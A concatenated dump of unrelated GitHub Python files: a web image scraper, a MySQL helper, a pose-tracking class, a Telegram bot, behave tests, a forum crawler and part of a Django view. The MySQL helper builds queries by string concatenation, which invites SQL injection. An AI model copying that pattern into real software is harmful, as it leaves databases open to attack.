saved.\n# '-r' means that the spider will download the images from the first page.\n# '-l 3' means that the spider will go 3 levels deep in the website.\n\n\n# First parse the url given by the user\ndef get_links(url):\n url_components = urlparse(url) # Parse the url (analyze and split it)\n url = url if url_components.scheme else url_components._replace(scheme='http').geturl() # If the url doesn't have a scheme, add http\n\n page_content = requests.get(url) # Get the content of the url\n html = page_content.content # Get the content of the page\n \n soup = BeautifulSoup(html, 'html.parser') # Parse the html\n\n links = []\n for link in soup.find_all('a', href=True):\n if link['href'].startswith('http') or link['href'].startswith('https'): #if the image has a src attribute, complete the url\n full_link_url = urljoin(url, link['href'])\n links.append(full_link_url)\n else:\n continue \n return links\n\n# Recursive function that extracts all the links from a website\ndef recursive_links(url, level):\n visited_links = set()\n links_stack = [url]\n visited_links.add(url)\n while level > 0 and links_stack:\n current_link = links_stack.pop()\n level -= 1\n links = get_links(current_link)\n for link in links:\n print(link)\n if link not in visited_links:\n links_stack.append(link)\n visited_links.add(link)\n return (visited_links)\n\n# Function that extracts the title of a website\ndef get_title(url):\n\n response = requests.get(url)\n\n html = response.content\n\n soup = BeautifulSoup(html, 'html.parser')\n\n title = soup.find('title').text\n return(title)\n\n# Function that extracts all the images from a website\ndef get_images(url, path):\n url_components = urlparse(url) # Parse the url (analyze and split it)\n url = url if url_components.scheme else url_components._replace(scheme='http').geturl() # If the url doesn't have a scheme, add http\n main_url = url_components.scheme + '://' + url_components.netloc + '/'\n\n page_content = requests.get(url) # Get the content of the url\n html = page_content.content # Get the content of the page\n \n soup = BeautifulSoup(html, 'html.parser') # Parse the html\n\n # Create a directory to save the images if it doesn't exist\n os.makedirs(path, exist_ok=True)\n\n #print(f\"\\n \\n Downloading images from {url} \\n \\n\")\n\n for image in soup.find_all('img'):\n image_url = image.get('src')\n #print(f\"\\n \\n url original: {image_url}\")\n try:\n if image_url and (image_url.startswith('http') or image_url.startswith('https')): #if the image has a src attribute, complete the url\n full_image_url = urljoin(url, image_url)\n print(f\"url completo: {full_image_url}\")\n image_content = requests.get(full_image_url) # Get the content of the image\n image_filename = os.path.join(path, image_url.split('/')[-1]) # Get the filename of the image\n with open(image_filename, 'wb') as f: # Write the image in the directory\n f.write(image_content.content)\n print(f'Image {image_filename} downloaded')\n elif image_url:\n full_image_url = urljoin(main_url, image_url)\n print(f\"url completo: {full_image_url}\")\n image_content = requests.get(full_image_url) # Get the content of the image\n image_filename = os.path.join(path, image_url.split('/')[-1]) # Get the filename of the image\n with open(image_filename, 'wb') as f: # Write the image in the directory\n f.write(image_content.content)\n #print(f'Image {image_filename} downloaded')\n except Exception as e:\n print(e)\n continue\n\n# Main function where the user can choose the options\ndef main():\n parser = argparse.ArgumentParser(prog ='Spider', description='Scraping tool to web images', epilog='Arachnida exercise from cybersecurity bootcamp of 42 Urduliz')\n parser.add_argument('-d', '--description', action='store_true', help='description of the program')\n parser.add_argument('-t', '--title', action='store_true', help='title of the page')\n\n parser.add_argument('-r', '--recursive_links', action='store_true', help='links in the page')\n parser.add_argument('-l', '--level', type=int, default = 5, help='level of recursion')\n parser.add_argument('-p', '--path', default = \"./data\", help='PATH to save the images')\n \n parser.add_argument('url', help='URL of the page to process')\n\n args = parser.parse_args()\n \n\n if args.description:\n print('This program will print the title and links of a given URL')\n if args.title:\n print(get_title(args.url))\n if args.recursive_links:\n print(f'This program will print all links in a given URL')\n start_time = time.time()\n for i in recursive_links(args.url, args.level):\n print(i)\n get_images(i, args.path)\n print(f\"--- {(time.time() - start_time)} seconds ---\")\n\nif __name__ == '__main__':\n main()","repo_name":"AppacheAZ/Arachnida","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34614585564","text":"#! /usr/bin/env python3\n# coding: utf-8\nimport private as p\nimport mysql.connector\nfrom mysql.connector import errorcode\n\nTABLES = {}\nTABLES['off'] = (\n \"CREATE TABLE IF NOT EXISTS off (\"\n \"EAN BIGINT PRIMARY KEY NOT NULL,\"\n \"Name VARCHAR(150) NOT NULL,\"\n \"Category SMALLINT,\"\n \"Stores VARCHAR(150),\"\n \"Grade CHAR(1) NOT NULL,\"\n \"URL Char(50) NOT NULL,\"\n \"CONSTRAINT fk_category_off_cat FOREIGN KEY off(Category)\"\n \"REFERENCES categories(id)\"\n \")ENGINE=InnoDB\")\nTABLES['mysubstituts'] = (\n \"CREATE TABLE IF NOT EXISTS mysubstituts (\"\n \"EAN BIGINT NOT NULL,\"\n \"Origin BIGINT NOT NULL,\"\n \"CONSTRAINT fk_EAN_subs_off FOREIGN KEY mysubstituts(EAN)\"\n \"REFERENCES off(EAN),\"\n \"CONSTRAINT fk_EAN_osubs_off FOREIGN KEY mysubstituts(Origin)\"\n \"REFERENCES off(EAN)\"\n \")ENGINE=InnoDB\")\nTABLES['categories'] = (\n \"CREATE TABLE IF NOT EXISTS categories (\"\n \"id SMALLINT PRIMARY KEY AUTO_INCREMENT,\"\n \"Name VARCHAR(15) NOT NULL UNIQUE\"\n \")ENGINE=InnoDB\")\nCATEGORIES = ('Laits', 'Beurres', 'Farines', 'Sodas', 'Pains')\n\n\nclass init_db():\n # Class who will connect the program to the database\n # and initialise the Tables if needed.\n def __init__(self):\n # Initialisation of the db connector and creation of the tables\n # required, also fill the catagory table with the CATEGORIES list\n try:\n self.con = mysql.connector.connect(host=p.host, user=p.user,\n passwd=p.passwd,\n database=p.dbname)\n self.curs = self.con.cursor()\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n else:\n print('Something went wrong when trying to connect \\\n to the database')\n return NONE\n self.create_tables()\n self.put_categories()\n\n def create_tables(self):\n # Function that create the tables\n self.curs.execute(TABLES['categories'])\n self.curs.execute(TABLES['off'])\n self.curs.execute(TABLES['mysubstituts'])\n\n def put_categories(self):\n # Function that fill the category table\n for item in CATEGORIES:\n try:\n self.curs.execute('INSERT ignore INTO categories(Name) VALUES \\\n (\\'' + item + '\\')')\n except mysql.connector.Error as err:\n print('Categories already in database\\n')\n self.con.commit()\n\n def erase(self):\n # Function that erase all the tables, only used when this file is\n # executed alone\n self.curs.execute('drop table mysubstituts,off,categories;')\n\n\nclass select():\n def __init__(self, cursor):\n # initialisation of the db cursor\n self.curs = cursor\n\n def cat_name_from_id(self, id):\n # Function that return the name of the category from its id\n query = 'SELECT Name FROM categories WHERE id like {}'.format(id)\n self.curs.execute(query)\n for item in self.curs:\n cat_name = item[0]\n return cat_name\n\n def cat_dict_id_name(self):\n # Function that return a dict of the categories id and name , used to\n # print the selection screen of the category\n self.curs.execute(\"select * from categories order by id\")\n categories = {str(a): b for (a, b) in self.curs}\n return categories\n\n def prod_10_rand(self, query):\n # Function that return 10 random products from the selected category\n self.curs.execute(query)\n prods = [a for a in self.curs]\n return prods\n\n def get_sub(self, category, product_ean):\n # Function that return one substitut that isnt the selected product,\n # from the same category and with equal or better nutrition_grade_fr\n query = 'select EAN from off where (EAN!=' + str(product_ean) + ' and \\\n Category=' + str(category) + ' and Grade<=(select Grade from off \\\n where EAN=' + str(product_ean) + ')) order by rand() limit 1;'\n self.curs.execute(query)\n sub = [a for a in self.curs]\n return sub[0][0]\n\n def get_sub_list(self):\n # Function that return the list of all the previously saved substituts\n self.curs.execute('select off.EAN,Name,URL,Grade,Category from \\\n off inner join mysubstituts on off.EAN = mysubstituts.EAN;')\n eans = [a for a in self.curs]\n return eans\n\n def get_prod_from_ean(self, ean):\n # Function that return a product information from its EAN\n self.curs.execute('select EAN,Name,URL,Grade,Category,Stores \\\n from off where EAN=' + str(ean) + ';')\n product = [str(a) for a in self.curs]\n return product\n\n def get_ean_of_origin(self, sub_ean):\n # Function that return the substituted product's ean from\n # the substitut's ean\n query = 'select Origin from mysubstituts where EAN=' +\\\n str(sub_ean) + ';'\n self.curs.execute(query)\n ean = [a for a in self.curs]\n return ean[0][0]\n\n\ndef main():\n db = init_db()\n db.erase()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"linor78/OFF_P5","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5732641988","text":"#!/usr/bin/env python3\n\n'''\nGet list of pairs of incompatible poses \nbecause only seen at one same position in chains\n'''\n\nimport numpy as np\nimport argparse\n\n#######################################\nparser =argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\nparser.add_argument('graph', help=\"graph of poses connectivity, in npz\")\nparser.add_argument('--npz', help=\"output in npz format\")\nparser.add_argument('--npy', help=\"output in npy format\")\nparser.add_argument('--txt', help=\"output in txt format\")\nargs = parser.parse_args()\n#######################################\n\ndef get_single_position_pairs(pools):\n # Get list of pairs of poses non-connectable\n # because only seen at one same position in chain\n all_pairs = set()\n nfrag = len(pools)\n #compare each pool to union of other pool\n for i in range(nfrag):\n pool = pools[i]\n for j in range(nfrag):\n if i != j:\n pool = [ i for i in pool if i not in pools[j]]\n pairs = set([ (a, b) for a in pool for b in pool if a1:\n\t\t\t\t\t\tword = porter_stemmer.stem(word)\n\t\t\t\t\t\tnew_sent = new_sent + word + ' '\n\t\t\tnew_sent = new_sent.strip()\n\t\t\tnew_sent = new_sent +'. '\n\t\tnewlist.append(new_sent)\n\t\tprint(len(newlist))\n\tprint(len(newlist))\n\tse = pd.Series(newlist)\n\tx['porter_stop'] = se.values\n\treturn x\n\n\n#Remove stopwords (nltk) and Porter stemming\nif __name__ == '__main__':\n\tp = Pool(10)\n\tdf = pd.read_pickle('./data.pkl')\n\tprint(df)\t\n\ttendf = np.array_split(df,10)\n\tprint(tendf[3])\n\tresult = p.map(f, [tendf[0], tendf[1], tendf[2], tendf[3],tendf[4], tendf[5],tendf[6], tendf[7],tendf[8], tendf[9]])\n\tp.close()\n\tfinal = pd.concat(list(result))\n\tprint(final)\n\tfinal = pd.DataFrame(final)\n\tfinal.to_pickle('./data.pkl')\n\n","repo_name":"cnclabs/codes.fin.attention","sub_path":"XRR/Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6975158369","text":"from sqlalchemy import select\n\nfrom telebot import TeleBot\nfrom telebot.types import Message, CallbackQuery\nfrom telebot import types\n\nfrom database import authors, books, conn\n\n\nclass User:\n def __init__(self, first_name: str, last_name: str, age: int, chat_id: int):\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n self.chat_id = chat_id\n\n def __repr__(self):\n return f'User(first name: {self.first_name}, last_name: {self.last_name}, age: {self.age})'\n\n\nusers: list[User | None] = []\nnew_user: User | None = None\n\n\nBOT_TOKEN: str = ''\n\nbot = TeleBot(BOT_TOKEN)\n\n\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message: Message):\n bot.send_message(chat_id=message.chat.id,\n text='''Привет! Это телеграм бот мастерской по Python!\\\n Советую нажать для начала на /something :) \\nА чтобы познакомиться, можешь нажать на /reg \n \\nЕсли хочешь почитать что-нибудь по Python, нажми /all_books!\n \\nСсылки на остальные матералы можешь получить по тегу /info''')\n\n\n@bot.message_handler(commands=['info'])\ndef info(message: Message):\n notion_url: str = 'https://educated-ambert-8c7.notion.site/Python-f340b5dcdad248f2acc5a26afd79e7ec'\n\n key_board = types.InlineKeyboardMarkup(\n [\n [types.InlineKeyboardButton(text='GitHub',\n url='https://github.com/arikmaster22/workshop-python'\n )\n ],\n\n [types.InlineKeyboardButton(text='Notion',\n url=notion_url\n )\n ],\n ]\n )\n\n bot.send_message(chat_id=message.chat.id,\n text='Ссылки на материалы', reply_markup=key_board)\n\n\ndef parse_books(data):\n parsed_books: list[str | None] = [None] * len(data)\n for i in range(len(data)):\n select_query_author_name = select(authors.c.name).where(data[i][2] == authors.c.id)\n\n author_name = conn.execute(select_query_author_name).scalar()\n\n parsed_books[i] = f'Title: {data[i][1]}\\nAuthor: {author_name}\\nPrice: {data[i][4]}\\nGenre: {data[i][3]}'\n\n return parsed_books\n\n\n@bot.message_handler(commands=['all_books'])\ndef send_books(message: Message):\n select_query = select(books)\n\n result = conn.execute(select_query).all()\n\n parsed_books = parse_books(result)\n\n for book in parsed_books:\n bot.send_message(chat_id=message.chat.id, text=book)\n\n\n@bot.message_handler(commands=['something'])\ndef send_something(message: Message):\n bot.send_message(chat_id=message.chat.id,\n text=\"Тыкни!\", parse_mode='HTML',\n disable_web_page_preview=True)\n\n\n@bot.message_handler(commands=['reg'])\ndef reg(message: Message):\n text: str = 'Введи свое имя, фамилию и возраст в формате фамилия имя возраст. Например, Муниев Аркадий 30 лет'\n\n bot.send_message(chat_id=message.chat.id, text=text)\n\n bot.register_next_step_handler(message=message, callback=signup)\n\n\n@bot.message_handler(content_types=['text'])\ndef signup(message: Message):\n parse_message = message.text.split()\n\n if len(parse_message) <= 3:\n bot.send_message(chat_id=message.chat.id, text='Чего-то не хватает :(')\n bot.register_next_step_handler(message=message, callback=signup)\n elif len(parse_message) == 4:\n try:\n first_name, last_name, age = parse_message[0], parse_message[1], int(parse_message[2])\n\n global new_user\n\n new_user = User(first_name=first_name, last_name=last_name,\n age=age, chat_id=message.chat.id)\n\n keyboard = types.InlineKeyboardMarkup() # клавиатура\n key_yes = types.InlineKeyboardButton(\n text='Да', callback_data='yes') # кнопка «Да»\n keyboard.add(key_yes) # добавление кнопки в клавиатуру\n\n key_no = types.InlineKeyboardButton(\n text='Нет', callback_data='no') # кнопка «Нет»\n keyboard.add(key_no) # добавление кнопки в клавиатуру\n\n question = f'Тебя зовут {first_name}, {last_name} и тебе {age} лет?'\n bot.send_message(message.from_user.id, text=question, reply_markup=keyboard)\n except TypeError:\n bot.send_message(chat_id=message.chat.id, text='Неправильно ввел возраст')\n bot.register_next_step_handler(message=message, callback=signup)\n else:\n bot.send_message(chat_id=message.chat.id, text='Слишком много параметров')\n bot.register_next_step_handler(message=message, callback=signup)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_worker(call: CallbackQuery):\n if call.data == \"yes\": # call.data это callback_data, которую мы указали при объявлении кнопки\n users.append(new_user)\n print(users)\n bot.send_message(chat_id=call.message.chat.id, text='Запомню :)')\n elif call.data == \"no\":\n bot.send_message(chat_id=call.message.chat.id, text='Введи еще раз свое имя, фамилию и возраст')\n bot.register_next_step_handler_by_chat_id(\n call.message.chat.id, callback=signup)\n\n\nif __name__ == '__main__':\n bot.infinity_polling()\n","repo_name":"arikmaster22/workshop-python","sub_path":"telebot-and-sqlalchemy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70628205353","text":"import cv2\nimport mediapipe as mp\n\nclass VideoCamera(object):\n def __init__(self):\n self.video = cv2.VideoCapture(0)\n self.mp_drawing = mp.solutions.drawing_utils\n self.mp_drawing_styles = mp.solutions.drawing_styles\n self.mp_pose = mp.solutions.pose\n self.pose = self.mp_pose.Pose(min_detection_confidence = 0.5, min_tracking_confidence = 0.5)\n self.height = self.video.get(4)\n self.good_left = 0\n self.good_right = 0\n\n def __del__(self):\n self.video.release()\n \n def get_frame(self):\n frame = self.video.read()\n jpeg = cv2.imdecode('.jpg', frame)\n\n def calculatePercentage(self, l_shldr_y, r_shldr_y,):\n range = self.height - self.good_left\n relative = l_shldr_y - self.good_left\n percentage = 0\n # if(self.good_left == 0 and self.good_right == 0): \n # print(\"Press P to record your position, or q to quit!\")\n if(l_shldr_y > self.good_left + 15 or r_shldr_y > self.good_right + 15):\n percentage = 100- ((relative/range) * 100)\n if (percentage <= 0):\n percentage = 0\n # print(\"BAD POSTURE, %\", percentage)\n else:\n percentage = 100\n # print(\"GOOD POSTURE!, %\", percentage)\n return percentage\n\n def processPosture(self):\n success, image = self.video.read()\n image.flags.writeable = False\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results = self.pose.process(image)\n\n #drawing indication lines\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n self.mp_drawing.draw_landmarks(\n image,\n results.pose_landmarks,\n self.mp_pose.POSE_CONNECTIONS,\n landmark_drawing_spec=self.mp_drawing_styles.get_default_pose_landmarks_style()\n )\n\n\n # Use lm and lmPose as representative of the following methods.\n # Process the image.\n keypoints = self.pose.process(image)\n lm = keypoints.pose_landmarks\n lmPose = self.mp_pose.PoseLandmark\n h,w = image.shape[:2]\n\n\n #flip image horizontally for mirrored view\n cv2.imshow('MediaPipe Pose', cv2.flip(image, 1))\n\n # wait for user to type in p \n if cv2.waitKey(1) == ord('p'):\n print('POSITION RECORDED!')\n self.good_left = int(lm.landmark[lmPose.LEFT_SHOULDER].y * h) \n self.good_right = int(lm.landmark[lmPose.RIGHT_SHOULDER].y * h)\n\n l_shldr_y = int(lm.landmark[lmPose.LEFT_SHOULDER].y * h)\n r_shldr_y = int(lm.landmark[lmPose.RIGHT_SHOULDER].y * h)\n\n return self.calculatePercentage(l_shldr_y, r_shldr_y)\n \n\n # variables made for convenience\n # mp_drawing = mp.solutions.drawing_utils\n # mp_drawing_styles = mp.solutions.drawing_styles\n # mp_pose = mp.solutions.pose\n # cap = cv2.VideoCapture(0)\n\n\n # pose = mp_pose.Pose(min_detection_confidence = 0.5, min_tracking_confidence = 0.5)\n # while webcam is running\n\n\n #returns the percentage of how good your posture is \n\n\n","repo_name":"aerann/StandingTall","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13718802939","text":"from fastapi.testclient import TestClient\nfrom behave import given, when, then\nfrom app.test.mockers.pdf_mocker import build_pdf_with_default_params\nfrom app.main import app\nfrom fastapi import status\nfrom app.api.models.pdf import Status\n\n\n# Create a TestClient instance to interact with the FastAPI application\ntest_app = TestClient(app=app)\n\nglobal_pdf_name = ''\nglobal_response = None\nglobal_data = None\n\n@given('That there is a PDF that needs to be updated with the name \"{pdf_name}\"')\ndef step_given_that_there_is_a_pdf_with_the_name(context, pdf_name):\n global global_pdf_name\n global global_data\n global_pdf_name = pdf_name\n pdf = build_pdf_with_default_params()\n pdf.nome = pdf_name\n global_data = pdf.dict()\n test_app.post(\"/pdfs\", json=pdf.dict())\n\n@given('That there isnt a PDF registered with the name \"{pdf_name}\"')\ndef step_given_that_there_is_a_pdf_with_the_name(context, pdf_name):\n pass\n\n@when(u'I send an UPDATE request to /pdfs/\"{pdf_name}\"')\ndef step_when_send_update_request_by_name(context, pdf_name):\n global global_response\n global global_pdf_name\n\n # Store the expected PDF name for later validation\n global_pdf_name = pdf_name\n\n endpoint = f\"/pdfs/{global_pdf_name}\"\n\n global_data['status'] = Status.CONCLUIDO\n updated_data = global_data\n\n # Send the UPDATE request\n global_response = test_app.put(endpoint, json=updated_data)\n\n@then(\"the UPDATE by name response status code should be 200 OK\")\ndef step_then_check_status_code_ok(context):\n global global_response\n assert global_response.status_code == status.HTTP_200_OK\n\n@then(\"the UPDATE by name response status code should be 400 BAD REQUEST\")\ndef step_then_check_status_code_bad_request(context):\n global global_response\n assert global_response.status_code == status.HTTP_400_BAD_REQUEST\n\n@then('the PDF with the name \"{pdf_name}\" status should be \"{new_status}\"')\ndef step_then_the_pdf_with_the_name_should_have_status(context, pdf_name, new_status):\n global global_response\n endpoint = f\"/pdfs/{pdf_name}\"\n response = test_app.get(endpoint)\n global_response = response\n assert global_response.json()[\"status\"] == getattr(Status, new_status)","repo_name":"ArthurSudbrackIbarra/T1-Metodos-e-Modelos","sub_path":"app/test/features/steps/update_pdf_by_name.py","file_name":"update_pdf_by_name.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"53643109","text":"import typing\n\nfrom search.martylib.protobuf_utils.repeated import replace_in_repeated\nfrom search.martylib.core.logging_utils import configure_binlog\nfrom search.martylib.test_utils import TestCase\n\nfrom search.mon.tickenator_on_db.src.reducers.progress_steps.task_runners.base_create_task_runner import BaseCreateTaskStepRunner\nfrom search.mon.warden.proto.structures import component_pb2, duty_pb2, owner_pb2\nfrom search.mon.tickenator_on_db.proto.structures import manual_ticket_pb2\n\n\nclass TestAssigneeFollowersDuty(TestCase):\n\n @classmethod\n def setUpClass(cls):\n configure_binlog(\n 'tickenator',\n loggers=('tickenator', 'martylib', 'zephyr'),\n stdout=True,\n )\n\n def _check_duty_assignee_followers(\n self,\n child_component: component_pb2.Component,\n parent_component: component_pb2.Component,\n correct_duty: typing.List[str],\n correct_assignee: str,\n correct_followers: typing.List[str],\n manual_ticket: typing.Optional[manual_ticket_pb2.ManualTicket] = None,\n functionality_duty: typing.Optional[typing.Iterable[duty_pb2.DutyRecord]] = None\n ):\n runner = BaseCreateTaskStepRunner()\n duty = runner._get_duty([parent_component, child_component], functionality_duty if functionality_duty else [], False)\n self.assertListEqual(duty, correct_duty)\n assignee, followers = runner._get_assignee_and_followers(parent_component, child_component, manual_ticket, duty)\n self.assertEqual(assignee, correct_assignee)\n self.assertListEqual(followers, correct_followers)\n\n def test_owners(self):\n child_component = component_pb2.Component(\n duty_list=component_pb2.DutyList(on_duty=[\n duty_pb2.OnDuty(login='a'), duty_pb2.OnDuty(login='b')\n ]),\n owner_list=[owner_pb2.Owner(login='a'), owner_pb2.Owner(login='c'), owner_pb2.Owner(login='d')]\n )\n parent_component = component_pb2.Component()\n\n replace_in_repeated(child_component.protocol_settings.tickenator_settings.incident_followers, ['b', 'e'])\n replace_in_repeated(parent_component.protocol_settings.tickenator_settings.incident_followers, ['f'])\n\n child_component.protocol_settings.assign_on_duty = True\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b'], 'a', ['b', 'e', 'a'])\n\n child_component.protocol_settings.add_owner_to_ticket_followers = True\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b'], 'a', ['b', 'c', 'd', 'e', 'a'])\n\n replace_in_repeated(child_component.protocol_settings.tickenator_settings.incident_followers, [])\n child_component.protocol_settings.assign_on_duty = False\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b'], 'a', ['c', 'd', 'f', 'a', 'b'])\n\n child_component = component_pb2.Component(\n duty_list=component_pb2.DutyList(on_duty=[\n duty_pb2.OnDuty(login='a'), duty_pb2.OnDuty(login='b'), duty_pb2.OnDuty(login='c')\n ])\n )\n parent_component = component_pb2.Component(\n owner_list=[owner_pb2.Owner(login='a'), owner_pb2.Owner(login='d'), owner_pb2.Owner(login='e')]\n )\n\n child_component.protocol_settings.assign_on_duty = True\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['b', 'c', 'a'])\n\n child_component.protocol_settings.add_owner_to_ticket_followers = True\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['b', 'c', 'a'])\n\n child_component.protocol_settings.add_owner_to_ticket_followers = False\n parent_component.protocol_settings.add_owner_to_ticket_followers = True\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['b', 'c', 'd', 'e', 'a'])\n\n child_component.protocol_settings.assign_on_duty = False\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['d', 'e', 'a', 'b', 'c'])\n\n manual_ticket = manual_ticket_pb2.ManualTicket()\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['d', 'e', 'a', 'b', 'c'], manual_ticket)\n\n def test_manual_ticket(self):\n child_component = component_pb2.Component(\n duty_list=component_pb2.DutyList(on_duty=[\n duty_pb2.OnDuty(login='a'), duty_pb2.OnDuty(login='b'), duty_pb2.OnDuty(login='c')\n ])\n )\n parent_component = component_pb2.Component(\n owner_list=[owner_pb2.Owner(login='a'), owner_pb2.Owner(login='d'), owner_pb2.Owner(login='e')]\n )\n manual_ticket = manual_ticket_pb2.ManualTicket(assignee='f')\n\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'f', ['a', 'd', 'e', 'b', 'c'], manual_ticket)\n\n manual_ticket = manual_ticket_pb2.ManualTicket(assignee='f', followers=['j', 'h', 'i'])\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'f', ['j', 'h', 'i'], manual_ticket)\n\n manual_ticket = manual_ticket_pb2.ManualTicket(followers=['j', 'h', 'i'])\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['j', 'h', 'i'], manual_ticket)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"Search engine/tests/test_assignee_followers_duty.py","file_name":"test_assignee_followers_duty.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31005229829","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nurl = \"https://www.ptt.cc/bbs/NBA/index6500.html\"\nheaders = {\"User-Agent\": \"Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.40\"}\nrequest = requests.get(url, headers=headers)\n# print(request.text)\nsoup = BeautifulSoup(request.text, \"html.parser\")\narticle = soup.find_all(\"div\", class_=\"r-ent\")\ndata_list = []\n\n# print(article[0])\nfor a in article:\n dict = {}\n title = a.find(\"div\", class_=\"title\")\n if title and title.a:\n title = title.a.text\n else:\n title = \"沒有標題\"\n # print(title)\n dict[\"標題\"] = title\n popular = a.find(\"div\", class_=\"nrec\")\n if popular and popular.span:\n popular = popular.span.text\n else:\n popular = \"N/A\"\n dict[\"人氣\"] = popular\n #print(f\"標題:{title},人氣:{popular}\")\n date = a.find(\"div\", class_=\"date\")\n if date:\n date = date.text\n else:\n date = \"沒有日期\"\n print(f\"標題:{title},人氣:{popular},日期:{date}\")\n dict[\"日期\"] = date\n data_list.append(dict)\nprint(data_list)\n\ndf = pd.DataFrame(data_list)\ndf.to_excel(\"ppt_nba_copy.xlsx\",index=False , engine=\"openpyxl\")\n\nprint(\"已經成功轉成ppt_nba_json\")\n\nif request.status_code == 200:\n with open(\"output.html\",'w',encoding=\"utf-8\") as f:\n f.write(request.text)\n print(\"寫入成功\")\nelse:\n print(\"沒有抓到資料\")\n\n\n","repo_name":"wp900622/pythonCrawler","sub_path":"Crawler.py","file_name":"Crawler.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15082406799","text":"def n(num):\r\n ret=0\r\n for i in range(10):\r\n ret+=int((num%(10**(i+1)))/(10**i))\r\n return ret\r\n\r\na=int(input())\r\nif a%n(a)==0:\r\n print('Yes')\r\nelse:\r\n print('No')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc080/B/4981194.py","file_name":"4981194.py","file_ext":"py","file_size_in_byte":169,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"4690646460","text":"guess = None\nvalue = 5\ntrial = 5\n\nprint(\"WELCOME TO OUR GUESS GAME\")\n\n\nwhile trial > 0:\n print('Your remaining trial is {}'.format(trial))\n guess = int(input('enter a number: '))\n if guess == value:\n print('You win')\n break\n \n else:\n trial = trial-1\nelse:\n print('You loss')\n ","repo_name":"aisha22020/Aisha","sub_path":"guess_game.py","file_name":"guess_game.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5813985081","text":"from likeprocessing.processing import *\n\ndef setup():\n createCanvas(200, 200)\n background('darkblue')\n stroke('white')\n noLoop()\n\ndef draw():\n for i in range(20, 200 , 20 ):\n line(i , 20, i , 180)\n\nrun(globals())","repo_name":"oultetman/pyprocess_exo","sub_path":"exo2.4.py","file_name":"exo2.4.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3981581110","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic.edit import UpdateView\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.contrib import messages\nfrom django.db.models import Avg\nfrom main.models import *\nimport datetime\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# dashboard libraries\nfrom math import pi\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Patch\nfrom matplotlib.lines import Line2D\nimport base64\nimport re\nfrom io import BytesIO\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer, TfidfTransformer\nfrom sklearn.feature_extraction import text\nimport pandas as pd\n\nfrom utils import chatgpt\nfrom .core import feedback_system_prompt\nfrom . import core\n\n\ndef index(request):\n return render(request, \"report.html\")\n\ndef get_user_percentage_completion(curr_user, track_title):\n # get percentage of people who have completed the track\n curr_track = Track.objects.get(title=track_title)\n serieses = Series.objects.filter(track=curr_track)\n videos = Video.objects.filter(series__in=serieses)\n total_videos = videos.count()\n completed_videos = ModuleCompletion.objects.filter(user=curr_user, module__video__in=videos).count()\n percentage = round(completed_videos / total_videos * 100)\n return percentage\n\ndef produce_plot(track_title, curr_user):\n percentage = get_user_percentage_completion(curr_user, track_title)\n\n fig, ax = plt.subplots(figsize=(2, 2))\n data = [percentage, 100-percentage]\n wedgeprops = {'width':0.3, 'edgecolor':'black', 'lw':3}\n patches, _ = ax.pie(data, wedgeprops=wedgeprops, startangle=90, colors=['#5DADE2', '#FFD600'])\n 